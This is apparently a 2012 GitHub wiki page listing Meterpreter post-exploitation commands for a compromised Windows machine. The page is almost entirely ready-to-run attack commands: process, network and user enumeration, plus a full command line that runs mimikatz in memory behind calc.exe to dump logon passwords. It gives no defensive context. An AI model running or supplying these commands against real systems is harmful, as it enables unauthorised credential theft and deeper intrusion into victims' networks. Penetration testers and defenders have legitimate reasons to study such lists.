Skip to content
Rob Fuller edited this page Sep 17, 2012 · 3 revisions

Meterpreter Post Exploitation Command list

  1. netstat
  2. ps
  3. getuid
  4. sysinfo
  5. run post/windows/gather/forensics/enum_drives
  1. run mimikatz in-memory:
    1. execute -H -i -c -m -d calc.exe -f mimikatz.exe -a '"privilege::debug" "sekurlsa::logonPasswords full" exit'

Resources

Clone this wiki locally